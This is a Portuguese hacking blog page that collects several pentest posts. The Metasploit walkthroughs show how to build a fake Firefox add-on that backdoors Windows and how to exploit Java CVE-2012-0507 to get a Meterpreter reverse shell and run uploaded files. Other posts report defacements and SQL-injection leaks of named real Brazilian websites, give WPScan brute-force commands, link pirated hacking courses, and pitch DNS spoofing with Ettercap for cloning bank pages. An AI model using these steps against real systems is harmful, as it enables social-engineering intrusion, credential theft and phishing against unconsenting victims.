http://skamason.com/7b9R

http://skamason.com/7b9R
Mostrando postagens com marcador Pentest. Mostrar todas as postagens
Mostrando postagens com marcador Pentest. Mostrar todas as postagens

sexta-feira, 1 de fevereiro de 2013

Hacking Windows 7 e XP com falsas Firefox Add-On (XPI): Tutoriais Metasploit

O que exatamente eu vou fazer?!

  1. Criar uma extensão do Firefox falso com Metasploit que cria uma backdoor no sistema da vítima.
  2. Enganam os usuários de instalar o add-on
  3. Invadir o computador de destino.
Pré-configuração:
  • Como de costume, você tem que configurar duas máquinas virutal (VM) no seu virtualbox ou seja, "Destino" e "atacante".
  • Instalar o windows xp ou 7 na VM de destino.
  • Instale o Backtrack na VM atacante.
precisam de ajuda para configurar o VM?! você pode ler este tutorial " Configurar laboratório pentesting ".

Parte I: Atualize o Metasploit
Como estamos indo para usar o mais recente módulo, você são aconselhados a atualizar os módulos do Metasploit. Não sei como fazer isso? Não precisa se preocupar!
  • Abra o Terminal
  • Tipo msfupdate
  • Isto irá atualizar o Metasploit com o mais recente módulos :)
Parte II: definições de configuração no Metasploit para a exploração falso-addon
Etapa 1:

Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.
Etapa 2:
Tipo "use exploit / multi / browser / firefox_xpi_bootstrapped_addon" no console.
Etapa 3:
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Ao contrário do último tutorial, este módulo tem uma configuração extra para o módulo nomeadamente "addonname".
Passo 4: Configurações
Vamos definir a configuração para a sua exploração.
Digite os comandos destacou um por um no console
Comando: definir falso addonname
Detalhes: Nome para o falso add-on. você pode alterar o "fake" para qualquer nome.
Comando: SRVHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Se você tem dificuldade em obter os detalhes de ip, por favor mande seu comentário ou ler meu post anterior.

Comando: set SRVPORT 80
Detalhes: Nosso servidor vai ser acessada através da porta 80 (porta padrão)
Comando: set URIPATH fakeEx
Detalhes: O caminho em que o falso add-on estará disponível para download. Por ex: http://192.168.56.11/fakeEx

Comando: LHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Passo 5: Carga

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp
Parte III: ataque de engenharia social

Configurado com êxito as configurações para a sua exploração, o que mais?! vamos lançar o exploit.
Digite "proeza" no console.
Agora, o exploit é iniciado. Nosso falso add-on está disponível em "http://192.168.56.11/fakeEx".

Uma vez vítima visitar o link, ele vai pedir usuário para instalar o add-on para visualizar a página. Quando o usuário instalar o add-on, o sistema será backdoor-ed.




Agora, você pode controlar o sistema vítima de Meterpreter.


Contramedidas:
Eu acredito que você entende os riscos de instalar o add-on de fontes desconhecidas. Então, pense duas vezes antes de instalar o add-on. Sempre use confiança extra. Pesquisa no google por comentário sobre o add-on.

Disclaimer:
O artigo dado aqui é o propósito educacional somente. Sugerimos que você tente este método em um ambiente controlado virtualbox. Nós não somos responsáveis ​​por sua atividade ilegal.
 
 
 
Fonte: BTS 

Como cortar computador remoto usando Metasploit? Explorando vulnerabilidade Java


Sempre que alguém diz PenTesting ferramenta, a primeira coisa que vem em nossa mente é Metasploit. Hoje, eu estou indo para demonstrar como utilizar a ferramenta Metasploit para explorar o popular java AtomicReferenceArray vulnerabilidade Violação Tipo (CVE-2012-0507).
Sobre o Metasploit :
Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Quadro dominar o: Um curso livre de Offensive-Security
A equipe de segurança ofensiva, juntamente com vários membros ativos da comunidade, fez um curso gratuito sobre o "Dominando o quadro" Metasploit Framework. O curso abrange coleta de informações, ataques de engenharia social, explorar o desenvolvimento, evitar Avanço AV e etc ..

O curso está disponível aqui:
www.offensive-security.com/metasploit-unleashed/Introduction

Doações para HFC, alimentar uma criança!
O "Dominando o quadro" é o curso livre. Se você gostou do curso, por favor, doe para Hackers para Caridade (HFC). Além de simplesmente fornecer alimentos para crianças carentes no leste da África, os hackers para o Programa de Alimentação Caridade permite que as crianças e suas famílias para sustentar-se e tornar-se mais auto-suficiente, ensinando-lhes valiosas habilidades agrícolas. Cada centavo recebido é enviado diretamente Hackers para Caridade em apoio da sua missão. Qualquer valor, não importa quão pequeno, faz a diferença, que só leva $ 9,00 para alimentar uma criança durante um mês.

Você pode encontrar mais detalhes sobre a doação aqui:
http://www.offensive-security.com/metasploit-unleashed/Donate

Ei, onde você vai?! Espere um pouco, tomar esse curso Uma vez que eu demonstrar como utilizar o Metasploit. Porque, vai ser difícil de entender ou chato, se você ler essas coisas diretamente.

Requisitos:
  • VirtualBox
  • Alvo OS (janelas, ...)
  • Distro PenTesting (Backtrack)
  • JRE 6 (versão sem patch)

CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.

Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.

(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).

Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.

Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.

Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.

conexão lenta de Internet?! Se você tem conexão de internet lenta, então você pode baixar o módulo java_atomicreferencearray sozinho em vez de atualizar todos os módulos.
Faça o download do java_atomicreferencearray.rb e colar nesta pasta "opt/metasploit/msf3/modules/exploits/multi/browser / /"

Então, Download CVE-2012-0507.jar e cole nesta pasta "/ opt/metasploit/msf3/data/exploits /"
Parte III:

Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:



Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.

Etapa 2:
Tipo "use exploit / multi / browser / java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.


Agora digite "mostrar opções" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.



Agora digite "definir SRVPORT 80".
e "definir URIPATH /".



Passo 3: Carga Set
Tipo "cargas Show", essa vontade exibe a lista de cargas. Nós vamos usar o 'reverse_tcp' payload. Esta carga terá conexão TCP inversa do alvo para PenTesting máquina.

Tipo 'set carga java / Meterpreter / reverse_tcp' no console.


definir LHOST [IP_address]: A fim de obter conexão reversa, nós temos que definir o nosso IP no LHOST.

Abra o terminal e "ifconfig" tipo. Isto irá exibir a informação de IP da nossa máquina PenTesting. O IP será "192.168.56.x". Por exemplo, deixe-me dizer o ip é 192.168.56.10.

Agora Digite o msfconsole como "conjunto LHOST 192.168.56.10".



Parte IV: Rompendo a máquina de destino:

Então, você está pronto?! Vamos invadir o computador de destino.

Etapa 1:

Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: http://192.168.56.10). Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.

passo 2:

Abra o Firefox / IE na máquina de destino.
Digite "http://192.168.56.10".
Ele carrega nada, mas exploit será executado em segundo plano.
Etapa 3:
Abrir a máquina BT5, ele irá exibir o seguinte resultado:


Agora digite "sessões", isto irá mostrar a lista de sessões ativas.

Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar com o Target.



Passo 4: upload de arquivos
Yeeeh ..! temos backdoor na máquina de destino, agora podemos executar comandos no alvo.


Por exemplo, digitando "sysinfo 'irá exibir as informações do sistema.

Você também pode carregar e executar seus próprios arquivos executáveis ​​na máquina de destino.

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.


Dicas de Segurança:
Atualize seu JRE para a versão mais recente.


conclusão:
Espero que este artigo lhe deu uma boa visão como usar Metasploit Framework para explorar a vulnerabilidade Java. Espero que isso irá ajudá-lo a entrar no mundo PenTesting ..!

quinta-feira, 4 de outubro de 2012

Routerpwn

 




Routerpwn é um roteador residencial ferramenta de auditoria de segurança para testadores de penetração.

É uma compilação de pronto para executar web exploits locais e remotos. Programada em Javascript e HTML para funcionar em todos os "telefones inteligentes" e dispositivos de internet móvel. Você pode usá-lo off-line para a exploração local sem conexão à internet. Você pode mudar o IP de destino, clicando no [IP] link ao lado do exploit.

 Creditos: Faccao Bnz

terça-feira, 24 de julho de 2012

BoliviaCultural Hacked By Brazilian Cyber Army

 
 

Hacked By Brazilian Cyber Army

 
http://www.boliviacultural.com.br/
http://www.boliviacultural.com.br/ver_noticias.php?id=1438
Host IP: 66.197.254.101
Web Server: Apache
Powered-by: PHP/5.2.17
Keyword Found: Peru
DB Server: MySQL
 
Mais Informações: http://pastebin.com/RMMNACZT


terça-feira, 17 de julho de 2012

Tv Cultura Leacked By Brazilian Cyber Army



Hacked By NeoInvasor

  • Host: http://www3.tvcultura.com.br/
  • Host IP: 200.136.27.84
  • Web Server: Apache/2.2.16 (Debian)
  • Powered-by: PHP/5.3.3-7+squeeze3
  • Keyword Found: Query
  • Selected Column Count is 18
  • Valid String Column is 1
  • DB Server: MySQL
  • Current DB: cms
  • Current User:   devsql2@172.20.1.26
  • Sql Version:    5.1.49-3
  • Current DB:     cms
  • System User:    devsql2@172.20.1.26
  • Host Name:      fpasrv064
     


quarta-feira, 11 de julho de 2012

Pentest no próprio pc com máquinas virtuais não funcionam!

PROVA DE QUE CONFIAR EM MÁQUINAS VIRTUAIS PARA PENTEST É SUICÍDIO PARA O PENTESTER PROFISSIONAL!

Senhores, boa noite, em plena madrugada vou escrever explicando e provando pela experiência que pentest se deve fazer de computadores de fora da rede totalmente.

Muitos hackerS e professores, erroneamente ensinam que para saber se seu computador está protegido, você deve instalar uma máquina virtual, instalar um sistema operacional e instalar neste ferramentas hackers para fazer o pentest, ou então instalar uma distribuição de pentest como o backtrack que eu inclusive sou fan e só uso ele. Basta testar com máquina virtual e está tudo perfeito. Será?

Bem, vamos comparar a experiência que fiz e tive e tirem suas conclusões:

Pentest usando máquina virtual com backtrack 4 instalado.

Ferramentas hackers usadas:

Nessus
Nmap
Nbtscan
SMtpscan
DNSscan
Super Scan
entre outros!

Foi desativado o serviço de netbios, icmp, bloqueando com o comodo firewall que é o melhor firewall do mundo na minha opnião para home users todas as conexoes de entrada.
Instalado IDS valhala honey pot e SAX2 (excelente honeypot paga). Entre outras configurações de segunrança para o windows 7 temos a seguir:

O resultado é que mesmo, com todo este arsenal, o IDS identificou o scanning dos scanners
Os scanners conseguiram se conectar as portas, mesmo estando ativado no firewall para bloquear todas e quais conexões de entrada. No meu caso apareceu aberta a porta 135 do serviço rpc e outras também com serviço rpc. identificado o sistema operacional windows pelos scanners.

Agora, usando um outro computador, mas que está na mesma rede, usando um roteador, O RESULTADO, FOI O MESMO!

Agora, olha que fantástico!


Conectando meu computador alvo em meu modem.


E o computador para fazer o pentest em uma rede wireless. A máquina de ataque está em uma rede diferene aqui amigos!


TEMOS UMA ATAQUE REAL AQUI. NÃO É REDE VIRTUALIZADA E NÃO ESTÁ NA MESMA REDE.

Sabem qual foi o resultado?

Não consegue scannear com nmap, nem com nessus, nem com nada!
Não consegue se conectar absolutamente a nenhuma porta.
Não consegue saber qual sistema operacional está funcionando!

O IDS nem identificou nada, por que não houve conexão!

O computador atacado estava com as mesmas configurações de antes. E nada do ataque funcionar! Veja os procedimentos que usei para defender meu sistema!


O firewall comodo, bloqueando todas as conexões de entrada além de outras regras mais rígidas.
Serviçoes de acesso remoto foram desativados.
Serviços de netbios desativados. Compartilhamento de arquivos desativado.
Em fim, nada de identificação.

Os scanners apenas conseguem saber se estou online, só isso, mas nada!


Desativando as defesasFazendo o ataque com o computador vulnerável para testar a efetividades de ferramentas sendo usadas sozinhas como o IDS.

Desativei o firewall, e ativei os serviços de net bios e todos os outros de acesso remoto e deixei só o IDS SAX2 e o valhala.

Consegui então scannear as portas 135 e outras de serviço rpc.

O VALHANA HONEYPOT, NÃO CONSEGUIU IDENTIFICAR O ATAQUE.

O SAX2 HONEYPOT CONSEGUIU! Parabéns!

A conclusão que podemos tirar disso tudo é que, o valhala, identifica ataques de máquinas virtuais, mas de outro computador, se você for atacado com stealth scan, ele não pega, e você naõ saberá que está sendo invadido.

Muitas pessoas ficam iludidas com a eficiência do valhala por que TESTAM COM MÁQUINA VIRTUAL PARA SABER SE ELE FUNCIONA. Mas na vida real é diferente, a pergunta que devemos fazer é. será que em um ataque real de outra rede, meu ids vão funcionar? Meu firewall vai bloquear?

O SAX2 está de parabéns conseguiu identificar, mas quando eu coloquei o firewall para bloquear todas as conexões de saída, ele nem identificou por que o nmap e nessus não conseguem scannear nenhuma porta!

Com este relato inédito talvez, vocês aprendizes e até experientes, sabem que para ver realmente se tudo está protegendo, e se o seu pc ou rede está funcionando, É NECESSÁRIO FAZER O PENTEST DE UMA REDE TOTALMENTE DIFERENTE DA SUA, DE OUTRO COMPUTADOR!

Por que é necessário simular um ataque real para testar sua segurança!

Muitos vídeos no you tube os ataques são à máquinas virtuais, mas na realidade, sem ser com máquinas virtuais não funcionam!

E as vezes um tipo de defesa de firewall funcionam na simulação de máquinas virtuais, mas quando o ataque é feito de outra rede os firewalls não funcionam! Ou o mesmo acontece para IDS, como aconteceu com o valhala que não identificou o ataque onde as portas scannear apareceram no scanner nmap e nessus, mas o valhala não identificou. E eu testei com scan invisível, com agressivo que é facilmente identificável. Mas nada do valhala funcionar!

OUTROS DETALHES ALARMANTES!

Configurei o FIREWALL DO WINDOWS, DA SYMANTEC OU NORTON, E OUTROS
Programei eles para bloquear todas as conexões de entrada.

Fiz o mesmo ataque e:

O nmap e nessus identificou as portas!
COMO É QUE VOCÊ MEU AMIGO PAGA R$ 100 POR ANO POR UMA DROGA DESSA!

O comodo firewall que é grátis, só permitiu que o nmap e nessus identificasse meu computador alvo como online, só isso, nada de nenhuma porta, nada de nenhum serviço, nada de identificação de sistema operacional algum. FANTÁSTICO SIMPLESMENTE É GRATUITO!


CONCLUSÃO

Se quer ser um hacker, e fazer pentest, compre e tenha dois computadores e use redes totalmente isoladas umas das outras. NÃO USE MÁQUINAS VIRTUAIS POR QUE O TESTE PODE SER ENGANOSO! Me agradeçam pois muitos iniciantes pensam que máquinas virtuais simulam igualmente um ataque real. TOTALMENTE ERRADO ISSO, E TEM GENTE ENSINANDO ISSO POR TODO O LUGAR! EU JÁ CAI NESTE CONTO, MAS AGORA ANIQUILAR ESTA MIRAGEM QUE ENGANA VÁRIOS PROFISSIONAIS DE SEGURANÇA!

Faça o pentest, para testar todos as ferramentas.
Eu scannei com o firewall ativado para testar o firewall.
Depois sem o firewall para saber o que acontecia, mas com o ids ligado para ver se ele funciona mesmo, E o valhala, por exemplo não passou no teste e eu não uso aquilo mais!
Scanneei de novo, sem nada ativo para saber que portas aparecem , para saber se algum serviço que desativei, aparece no scan, POIS ASSIM SABERIA QUE NÃO FUNCIONOU A DESATIVAÇÃO E ENTÃO RESOLVERIA O PROBLEMA.

Então, senhores, queREm ser um pentesters? TENHA DOIS PCS, E DUAS REDES ISOLADAS ONDE VOCÊ USA CADA COMPUTADOR EM CADA UMA ISOLANDO-OS, PARA ATACAR DE VERDADE E COM BRUTALIDADE. SÓ ASSIM, PODERÁ GARANTIR A SEGURANÇA!

NÃO SIMULE NADA, ATAQUE DE VERDADE! MÁQUINAS VIRTUAIS E USAR A MESMA REDE MASCARAM O PENETRATION TEST!

Amigos hackers, é com enorme prazer que lhes passo esta informação pois compartilhar o bem com vocês é a minha missão.

Descobrindo vulnerabilidades em WordPress - WPSCAN

WPScan  é um Scanner de segurança para WordPress escrito em Ruby que tenta encontrar falhas de segurança conhecidas no interior das instalações WordPress. Usados pelos profissionais de segurança ou administradores WordPress para avaliar a postura de segurança de suas instalações de WordPress. A base de código é Open Source e licenciado sob a GPLv3 .
As características incluem:

Enumeração nome de usuário
Quebra de senha fraca (multithreaded)
Enumeração versão
Enumeração de vulnerabilidade (baseado na versão)
Enumeração dos plugin
Enumeração vulnerabilidade dos plugins (baseado na versão)
Outros cheques diversos

Instalação:


Instalando no Backtrack 5, ela é incluida no BT 5 R1



sudo apt-get install libcurl4-gnutls-dev
sudo gem install --user-install mime-types typhoeus xml-simple


Instalando no Debian/Ubuntu



sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
sudo gem install typhoeus xml-simple



Comandos:



--url ( A url do wordpress para escanear)
--enumerate enumeração ( Tipo de enumeração a fazer, podendo ser , u = usuario, v = versão , t = timthumb , p = plugin)
--wordlist ( Fornecer um arquivo contendo as possiveis senhas para o wpscan tentar o brute force)
--username (brute force apenas com um usuario especifico
--generate_plugin_list ( gera uma lista dos plugins )


Exemplos:



Checagem "Não intrusiva"

./wpscan.rb --url www.exemplo.com


Fazer um ataque de força bruta ultilizando o arquivo darkc0de.lst
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --threads 50


Fazer um ataque de força bruta apenas usando o login "admin"
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --username admin


Gerar uma nova lista de plugin 'mais popular', até 150 páginas ...
./wpscan.rb --generate_plugin_list 150


Enumerar plugins instalados
./wpscan.rb --url www.exemplo.com --enumerate p

quinta-feira, 28 de junho de 2012

Tipos de Pentest


O teste de intrusão é um processo de análise detalhada do nível de segurança de um sistema ou rede usando a perspectiva de um infrator. Trata-se de um teste realista do nível de segurança da infra-estrutura para obter a informação que ela contém.
No teste de invasão são testadas vulnerabilidades técnicas e conceituais da infra-estrutura alvo.
O objetivo principal é simular de forma controlada um ataque real que normalmente é executado por infratores. desta maneira seria possível obter o conhecimento total do que poderia acontecer caso esse ataque realmente existisse, garantindo assim a possibilidade de uma estratégia de prevenção.
Os tipos de Pentest, são:
  • Blind
  • Neste tipo de ataque o auditor não conhece nada sobre o alvo que irá atacar, porem o alvo sabe que será atacado e o que será feito durante o ataque.
  • Double Blind
  • Neste tipo de ataque o auditor não conhece nada sobre o alvo, e o alvo não sabe que será atacado e tão pouco quais testes serão realizados.
  • Gray Box
  • Neste tipo de ataque o auditor tem conhecimento parcial do alvo, e o alvo sabe que será atacado e também sabe quais testes serão realizados. Este é o tipo de pentest mais realista possível, aproximando-se de um ataque real.
  • Double Gray Box
  • Neste tipo de ataque o auditor tem conhecimento parcial do alvo, e o alvo sabe que será atacado, porém, não sabe quais testes serão executados.
  • Tandem 
  • Neste tipo de ataque o auditor tem total conhecimenot sobre o alvo, e o alvo sabe que será atacado e também o que será testado. Este tipo de ataque também é conhecido como “caixa de cristal”.
  • Reversal
  • Neste tipo de ataque o auditor tem conhecimento total do alvo, porém o alvo não sabe que será atacado, e tão pouco quais testes serão executados. Este tipo de ataque é ideal para testes a capacidade de resposta e como está o timing de acão da equipe de resposta a incidentes do alvo.

sexta-feira, 1 de junho de 2012

Tecnicas de invasao e defesa

Tecnicas de invasao e defesa

http://www.brc.com.br/files/artigos/pentest-conisli07.pdf

quinta-feira, 24 de maio de 2012

Mini curso de Pentest, deface e exploits

Mini curso de Pentest, deface e exploit

Link download: www.4shared.com/rar/X5aZESo2/mini_curso_sobre_pentest_defac.html

CURSO INTENSIVO DE TESTES DE INVASÃO PARA FINS DE SEGURANÇA

Curso de Pentest ################################################################################################

invasao para fins de segurança, sao apostilas entao aproveite e estude conhecimento nao e crime.....

Link do Download CURSO INTENSIVO DE TESTES DE INVASÃO PARA FINS DE SEGURANÇA

www.ziddu.com/download/14369294/pentest.rar.html

By: R410X

Super HIper curso Pentest

ola galera sou R410X estou aqui postando um hiper curso de pentest completo entao aproveite Obs: conhecimento nao e crime apenas saiba usa-lo =============================================================================================================================== O curso tem: -246 Videos com exploitation em backtrack 4,5 e Windows -1 curso em C para programar(Nao,pra comer mandioca) -24 Livros Dentre Eles: *Hacker Inside Todos os volumes *2 Livros offensive-security com 400 paginas cada *CEH Official Certified Ethical Hacker *Metasploit The Penetration Tester Guide -1 curso oficial da VTC-Ethical Hacking & Penetration que consiste em: *Footprint *Scanneamento *Enumeração *Vulnerabilidade *Acesso *Metodos Defensivos *Introdução a Tecnicas Hacker *Ferramentas Populares -Outros 201 Videos com o pessoal Underground e da Infinity Exists -Quebra de Wireless,Hijacking,Arp poisoning e MUINTO MAIS O curso tem 13,5 GB,para ajudar os mano da internet discada coloquei em Torrent Os video estao em ingles e espanhol,menos o hacker inside que é Portugues Estarei postando varios outros conteudos para a galera Agradeça pelo amor de deus,nao custa nada nem cai seu dedo(A nao ser que tenha material corrosivo no seu teclado)

Link download

http://kat.ph/pentests-t6262570.html

By: R410X

quarta-feira, 23 de maio de 2012

DNS Spoofing

Sumário
 
 O que é o DNS ?
 Tecnologias de Redes sem Fio
 DNS Spoofing
 Conclusão
 
 O que é DNS ?

  Na década de 80 a difusão da internet comecou a se tornar algo preocupante. Para ter
acesso a um determinado servidor ou máquina nós teriamos que saber o IP da máquina no qual
gostariamos de ter acesso, assim com os surgimentos de Web-Sites era estremamente complicado
ficar decorando enderecos de IP. Como todos sabems o IP é localizado na Camada de Rede e a 
sua principal funcão é mostrar onde está a máquina fisicamente para termos uma conexão.
  Em 1984 viram que estava ficando complicado a coisa então criaram uma coisa magnífica
chamada de DNS (Domain Name System) (: também chamado de nome de domínio. O DNS veio para
facilitar a nossa vida, agora todo IP tem um Nome ahhh =) Ao acessar um determinado DNS
ele é traduzido para o seu endereco real de IP para ser encontrada a máquina desejada
claro que o usuário não ve isso acontecer. Por exemplo www.google.com.br está
associado ao IP 74.125.229.183 então podemos acessa-lo por ambos "enderecos".
  No mundo temos o Total de 13 DNS globais com a finalidade de responder as requisicões
para as máquinas que vão acessar determinados IPs, chamamos também essa tarefa de 
resolucão de DNS.
  Creio que agora ficou claro para todos essa pequena explicacão sobre DNS, pois o cérebro
humano decora muito mais fácil nomes do que números!!
 - Tecnologias de Redes sem Fio

  É claro se vamos falar de DNS Spoofing não posso deixar passar batido e não falar sobre
Redes sem Fio, hoje quem não tem em casa um ponto de acesso de rede sem fio ?? (= Mas cuidado
elas podem ser bem perigosas, mas todo brasileiro tem a mania de dizer ahh você acha que aqui
perto de casa vai ter alguém que saiba "invadir" redes Wi-Fi ?? Aqui perto de casa só tem 
comércio, é ai que você se engana. Não podemos garantir total seguranca porque quem está
por trás delas são seres humanos e pessoas erram!! Garanto que muitos já acessaram provedores
de internet da sua cidade através de um Acces Point de rede sem fio... Bem além dos 
tipos de criptografias que elas utilizam, também usam as vezes filtro por IP e
MAC blábláblá e um monte de baboseiras, como disse antes não tem como garantir a seguranca
mas da para complicar ou vencer pelo cansaco.
  Bem Wi-Fi como todos conhecem é um conjunto de especificacões de redes sem fio baseado no
padrão IEEE 802.11, não vou falar sobre o IEEE agora, mas vou deixar nas referencias para os
curiosos que querem dar uma olhada... O Wi-Fi surgiu devido a necessidade de utilizar de redes
sem a necessidade de cabos, o sinal é transmitido através de um Access Point utilizando de 
radiofrequência.
  Cada rede sem fio tem um SSID (Service Set Identifier) ou seja cada rede recebe um nome de
identificacão, existem vários padrões de redes sem fio 802.11, 802.11a, 802.11b... mas isso
não vai interessar para nós agora.

-------------------
--------WEP--------
-------------------

  Com o surgimento das redes sem fio era necessário criar uma forma de terem seguranca nos
dados que são trafegados e também garantir que nenhum acesso indevido seja feito, então criaram
WEP (Wired Equivalent Privacy) não vou falar muito do seu funcionamento mas no próximo artigo 
que irei escrever será sobre Wi-Fi Cracking ai detalho mais sobre. A grande falha de se usar
WEP se dá devido ela utilizar apenas 1 chave tanto para encriptar e desencriptar os dados trafegados.
  Essa tecnologia usa criptografia RC4 de 64 ou 128 bits, sendo 24bits de vetor de inicializacão
com isso a chance da repeticão acontecer é realmente alta e como utiliza de chave única, assim 
podemos quebrar a chave e acessar a rede sem problemas.

-------------------
--------WPA--------
-------------------

  Bem com a preocupacão da seguranca em redes sem fio e perceberam que as redes estavam sendo
violadas facilmente mesmo utilizando WEP, resolveram criar a sua evolucão no qual foi chamada
de WPA (Wired Protected Access) . Ela usa uma chave de 128 bits e para gerar essa chave usa
do endereco de MAC com isso temos mais seguranca pois como o MAC é único as coisas complicam.
  Ai perceberam também que utilizar do conceito de chave única não era muito seguro assim 
implantaram um protocolo chamado TKIP (Temporal Key Integrity Protocol) com a finalidade de 
trocar a chave de tempos em tempos assim garantindo maior a seguranca mas nada que não possa
ser quebrado, só gastar um tempinho hehehe.

-------------------
--------WPA2-------
-------------------

  Essa foi a evolucão da WPA, utiliza de chave de 256 bits e o protocolo chamado AES
(Advanced Encryptation Standart) + TKIP, sendo assim é mais seguro porém tem uma perda
de desempenho de velocidade da rede. Não vou dar mais detalhes, para aqueles curiosos no próximo
artigo vou escrever sobre todas elas detalhando.

-------------------
-----Wi-Fi ??------
-------------------

  Vocês devem estar se perguntando porque falei de redes Wi-Fi nesse artigo né? Vamos aos fatos.
  Hoje em dia a técnica chamada de "DNS Spoofing" tem sido muito utilizada na WEB principalmente
detro de redes sem fio devido a facilidade de ganhar acesso a rede. Vou dar um exemplo claro e simples.
  Em várias cidades temos empresas que oferecem servicos de provedor de rede sem fio, aqui pelo menos
na minha cidade tem alguns, tem os legais e os ilegais (piratas rsrsrs), alguns utilizam WPA + liberacao por
MAC, mas nada que não se resolva com 2 ou 3 comandos no terminal (= Bem você já pensou se conseguir 
acesso a um servidor desses o que pode ser feito ?? Podemos spoofar por exemplo o endereco do facebook
e jogar o acesso para nossa máquina e pegar a senha de todos... Ou até mesmo ganhar uma sessão via
Meterpreter. Marcelo não entendi nada que você disse agora, bem eu dei uma passada da carroca na frente
dos bois então continuem lendo que irão entender.

 - DNS Spoofing

  A palavra spoof ao pé da letra quer dizer enganar, passar para trás, e é bem isso que o ataque consiste.
  DNS spoofing se da de fazer alteracão na tabela hostname-ip address, essa tabela informa a rota que 
será feita daquele endereco de DNS para aquele determinado IP, assim alterando o endereco dessa tabela
podemos redirecionar para onde quisermos. Basicamente é isso que iremos fazer logo abaixo, mas Marcelo
o que pode ser feito com isso? Muitas coisas hehehe, entre elas podemos criar uma página falsa do facebook
e quando a pessoa entrar cai na sua página que está rodando em um determinado servidor. Podemos até criar
uma sessão dependendo, mas o perigo fica geralmente quando é para retirar informacões confidenciais como
dados bancários por exemplo, clonar uma página de banco e spoofar o endereco de DNS para a página clone
vai da criatividade e do objetivo de cada um.

-------------------
-----Ettercap------
-------------------

  O Ettercap é um poderoso sniffing com várias funcionalidades, e o melhor ele trabalha com vários protocolos
entre eles TCP, SSH, HTTPS, IRC, VNC entre outros. Não vou falar muito sobre ele, no final tem referencias 
para leitura =D.

-------------------
----Instalando-----
-------------------
  Bem, eu utilizo a distribuicão BackTrack 5 R2, ela já vem com todas as ferramentas que vamos utilizar abaixo,
mas para aqueles que usam de Ubuntu/Debian vamos a um passo a passo.

  Para instalar o Ettercap é realmente simples, se você utiliza Ubuntu/Debian:

  $sudo apt-get install ettercap

  Após instalado ele já está pronto para uso. O Ettercap tem sua interface gráfica e a sua interface modo texto,
nesse artigo vou estar usando a interface modo texto. Agora vamos ao Help do Ettercap para ele nos mostrar os
parametros, para isso vamos ao shell:
  
 $ettercap -help                                                                                                                      
                                                                                                                                               
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA                                                                                               


Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -u, --unoffensive           do not forward packets
         .
  .
  .

  Vão se deparar com uma tela parecida com essa, nela é mostrado todos os tipos de parametros que podem ser
usados no ettercap e para que servem.

  A sua sintaxe é muito simples, se resume em : ettercap opcoes alvo, podendo combinar vários comandos.

-------------------
----Metasploit-----
-------------------

  O Metasploit Framework é uma poderosa ferramenta para efetuar PenTest contendo diversos exploits e Payloads
e também um excelente framework para desenvolvimento de exploits.

-------------------
----Instalando-----
-------------------

  Para efetuar a instalacão Ubuntu/Debian:

  $sudo apt-get install metasploit

  ou

             ---32 bits---
  $wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
  $chmod +x metasploit-latest-linux-installer.run
  $./metasploit-latest-linux-installer.run

             ---64 bits---
  $wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
